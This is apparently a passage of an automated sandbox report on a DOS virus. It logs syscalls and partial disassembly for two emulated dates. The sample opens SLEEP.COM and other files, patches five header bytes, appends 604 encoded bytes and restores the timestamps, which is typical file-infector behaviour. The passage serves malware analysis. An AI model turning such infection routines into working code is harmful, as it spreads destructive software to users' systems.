2018-12-25T12:27:50.226209326Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.227743487Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.235307915Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.242868275Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:51.316276431Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:51.318581426Z 71 PC: 12ad8 | Get current directory
2018-12-25T12:27:51.320869129Z 59 PC: 12ae2 | Change current directory
2018-12-25T12:27:51.3235338Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:51.331799897Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:51.339166149Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:51.343069869Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:51.345182019Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.347674954Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:51.348824033Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.352103513Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:51.355910938Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:51.371586727Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:51.374320647Z 62 PC: 12c4b | Close file
2018-12-25T12:27:51.387198912Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:51.390242816Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.397188714Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.405625589Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.407349424Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.409865727Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.41965306Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.427787415Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.430262228Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.439171797Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.440920218Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.449353198Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.46105196Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.473102256Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.479492758Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.481543509Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.484314096Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.48569045Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.489097016Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.491527522Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.4997824Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.502124856Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.510416696Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.513295764Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.520032469Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.527430957Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.528671476Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.531133334Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.533087653Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.535919249Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.538465554Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.547415638Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.549370208Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.562528456Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.565927784Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.572477352Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.579329441Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.581623368Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.584755795Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.586369248Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.589269761Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.594688365Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.602947227Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.604677958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.613242632Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.61623642Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.622784114Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.630763719Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.633023472Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.635994548Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.638413126Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.641655016Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.644320223Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.653867237Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.655510838Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.685319982Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.702079115Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.709554265Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.716070871Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.719891174Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.724267938Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.726033196Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.729057786Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.733089035Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.750689083Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.752272198Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.760607647Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.763280553Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.770283419Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.777186094Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.778872599Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.786440416Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.789777431Z 59 PC: 12c61 | Change current directory
2018-12-25T12:27:51.794299727Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:51.472148867Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:51.473960806Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:51.478728064Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:51.483113279Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:51.487257144Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:51.48915572Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.491120573Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:51.492109683Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.495027573Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:51.496738231Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:51.508574162Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:51.510930184Z 62 PC: 12c4b | Close file
2018-12-25T12:27:51.519019993Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:51.522189583Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.538426132Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.544773377Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.546100873Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.549130903Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.55435997Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.562767939Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.565378933Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.573578531Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.5803626Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.589893544Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.603603035Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.61024193Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.621890876Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.624423351Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.633818339Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.638851801Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.642716098Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.645651527Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.653748528Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.656872472Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.664743638Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.667683237Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.674797946Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.681268391Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.682769706Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.685831463Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.688414068Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.691267874Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.693530317Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.701818682Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.703155958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.710620999Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.714306151Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.72103268Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.727785279Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.730707636Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.734130765Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.735907956Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.740200255Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.742941483Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.75122894Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.753776805Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.762102354Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.764931087Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.772286366Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.779105318Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.780812106Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.783925347Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.78587732Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.788768802Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.791489355Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.800997173Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.802718958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.810401233Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.813506909Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.820144382Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.827096116Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.829339937Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.832159143Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.833758859Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.837121656Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.839626578Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.847658972Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.849779843Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.857415348Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.860163031Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.86704519Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.869496057Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.870983353Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.877943649Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.885007011Z 76 PC: 12a45 | Terminate with return code (Return code = '1')